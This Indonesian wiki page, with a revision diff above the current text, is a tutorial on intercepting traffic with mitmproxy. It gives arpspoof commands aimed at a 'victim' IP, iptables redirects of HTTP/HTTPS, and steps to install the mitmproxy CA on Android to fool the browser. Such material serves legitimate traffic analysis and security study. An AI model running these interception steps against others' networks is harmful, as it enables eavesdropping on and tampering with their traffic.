Difference between revisions of "MITM: mitmproxy"

From OnnoWiki
Jump to navigation Jump to search
 
(7 intermediate revisions by the same user not shown)
Line 34: Line 34:
 
ARPspoofing supaya gampang misalnya,
 
ARPspoofing supaya gampang misalnya,
  
 +
arpspoof -i <interface> -t <target> <IP router/gateway/server>
 
  arpspoof -i eth0 -t 192.168.0.106 192.168.0.100
 
  arpspoof -i eth0 -t 192.168.0.106 192.168.0.100
 
  192.168.0.106 = ip victim
 
  192.168.0.106 = ip victim
 
  192.168.0.100 = ip router / gateway / server yang akan di monitor
 
  192.168.0.100 = ip router / gateway / server yang akan di monitor
  
 +
mitmproxy secara internal run pada port 8080. Untuk menangkap traffic port 80/HTTP atau port 443/HTTPS, lakukan redirect port menggunakan,
  
mitmproxy secara internal run pada port 8080. Secara external run pada port 80/HTTP dan 443/HTTPS.
+
echo 1 > /proc/sys/net/ipv4/ip_forward
Lakukan,
+
sysctl -w net.ipv4.ip_forward=1
  
sysctl -w net.ipv4.ip_forward=1
 
 
  iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
 
  iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
 
  iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
 
  iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
 
  
 
Atau jika menggunakan Wifi / wlan0
 
Atau jika menggunakan Wifi / wlan0
  
 +
echo 1 > /proc/sys/net/ipv4/ip_forward
 
  sysctl -w net.ipv4.ip_forward=1
 
  sysctl -w net.ipv4.ip_forward=1
 +
 
  iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
 
  iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
 
  iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080
 
  iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080
 +
 +
arpspoof -i wlan0 -t 192.168.0.10 192.168.0.100
 +
arpspoof -i wlan0 -t 192.168.0.100 192.168.0.10
  
 
==Jalankan mitmproxy==
 
==Jalankan mitmproxy==
 +
 +
Pastikan server sasaran memang menjalankan HTTPS juga ingin mem-proxy traffic port 443.
  
 
Jalankan transparan proxy
 
Jalankan transparan proxy
  
  mitmproxy --mode transparent
+
  mitmproxy --mode transparent --ssl-insecure
 +
 
  
  
Line 65: Line 73:
  
 
untuk memonitor pada port lain gunakan switch -p
 
untuk memonitor pada port lain gunakan switch -p
 
  
 
==Referensi==
 
==Referensi==
  
 
* https://blog.heckel.xyz/2013/07/01/how-to-use-mitmproxy-to-read-and-modify-https-traffic-of-your-phone/
 
* https://blog.heckel.xyz/2013/07/01/how-to-use-mitmproxy-to-read-and-modify-https-traffic-of-your-phone/
 +
 +
 +
==Pranala Menarik==
 +
 +
* [[MITM]]

Latest revision as of 08:49, 27 November 2018

Sumber: https://blog.heckel.xyz/2013/07/01/how-to-use-mitmproxy-to-read-and-modify-https-traffic-of-your-phone/


Instalasi kalau dibutuhkan

Untuk non-Kali Linux perlu menginstalasi mitmproxy melalui perintah berikut.

Instalasi mitmproxy 

apt-get install python-pyasn1 python-flask python-urwid python-dev libxml2-dev libxslt-dev libffi-dev
pip install mitmproxy

Ini tidak perlu dilakukan di Kali Linux, karena kali linux sudah siap dengan mitmproxy.

Install CA

Kalau mau benar2 menipu browser, kita perlu menginstalasi CA Certificate MITMproxy, dari 

~/.mitmproxy/mitmproxy-ca-cert.cer

ke android, 

/sdcard/Download/mitmproxy-ca-cert.cer

Masuk ke menu android

  • Settings > Security > “Install from device storage”
  • Masukan “mitmproxy-ca-cert” (tanpa suffix!) > click “OK”
  • Klik “Trusted credentials” > Pilih “User” tab.
  • Certificate harusnya akan muncul di list.

Redirect IP

ARPspoofing supaya gampang misalnya, 

arpspoof -i <interface> -t <target> <IP router/gateway/server>
arpspoof -i eth0 -t 192.168.0.106 192.168.0.100
192.168.0.106 = ip victim
192.168.0.100 = ip router / gateway / server yang akan di monitor

mitmproxy secara internal run pada port 8080. Untuk menangkap traffic port 80/HTTP atau port 443/HTTPS, lakukan redirect port menggunakan, 

echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl -w net.ipv4.ip_forward=1

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080

Atau jika menggunakan Wifi / wlan0 

echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl -w net.ipv4.ip_forward=1

iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080

arpspoof -i wlan0 -t 192.168.0.10 192.168.0.100
arpspoof -i wlan0 -t 192.168.0.100 192.168.0.10

Jalankan mitmproxy

Pastikan server sasaran memang menjalankan HTTPS juga ingin mem-proxy traffic port 443.

Jalankan transparan proxy 

mitmproxy --mode transparent --ssl-insecure


versi lama 

mitmproxy -T --host

untuk memonitor pada port lain gunakan switch -p

Referensi


Pranala Menarik

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=MITM:_mitmproxy&oldid=52828"